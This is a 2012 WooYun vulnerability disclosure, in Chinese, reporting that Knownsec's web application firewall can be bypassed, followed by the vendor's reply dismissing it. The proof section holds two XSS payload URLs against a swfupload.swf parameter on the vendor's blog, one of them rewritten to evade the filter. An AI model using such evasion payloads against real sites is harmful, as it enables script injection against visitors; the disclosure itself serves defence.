当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08301

漏洞标题:知道创宇WAF防火墙绕过漏洞

相关厂商:知道创宇

漏洞作者: 路人甲

提交时间:2012-06-14 17:46

修复时间:2012-06-14 18:40

公开时间:2012-06-14 18:40

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-14: 细节已通知厂商并且等待厂商处理中
2012-06-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

知道创宇WAF防火墙可以被绕过。

详细说明:

知道创宇WAF防火墙存在问题,可以被绕过,造成SQL注入和XSS漏洞攻击成功。

漏洞证明:

访问wordpress xss会被WAF拦截
http://blog.knownsec.com/wp-includes/js/swfupload/swfupload.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;alert(/xss/)}}//


稍微变换下函数定义,WAF就不拦截了
http://blog.knownsec.com/wp-includes/js/swfupload/swfupload.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;xss=alert;xss(/xss/)}}//


修复方案:

需要加强WAF规则。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-06-14 18:40

厂商回复:

非常感谢这位路人甲同学提交的知道创宇WAF绕过问题, 我们非常重视此问题.
应剑心的建议, 下面我们对WAF这类产品做一个简单的科普:
所有厂商的WAF规则策略都是可配的, 当WAF摆在一个网站前面的时候, 需要结合网站业务特性以及网站原程序本身特性进行仔细的规则策略配置, 可以说WAF是一款定制性较强的产品.
通常各厂商的WAF在正式上线使用的时候, 都会禁用一些规则来提高效率以及针对特定业务避免误报来调整一些规则, 比如一个网站使用的数据库是mysql, 那么我们可能会禁用掉大部分只针对mssql或其他数据库的注入拦截规则以提高效率.
后期我们会专门放到网上一台WAF测试设备供大家测试, 由于结合业务而关闭大部分规则的WAF并不适合下定论是否可以bypass某些语句 :)
再次感谢这位路人甲同学提交的问题, 也感谢他以及所有业界白帽子们对知道创宇以及知道创宇产品的关注, 我们会继续努力与大家共同进步!

漏洞Rank:5 (WooYun评价)

最新状态:

暂无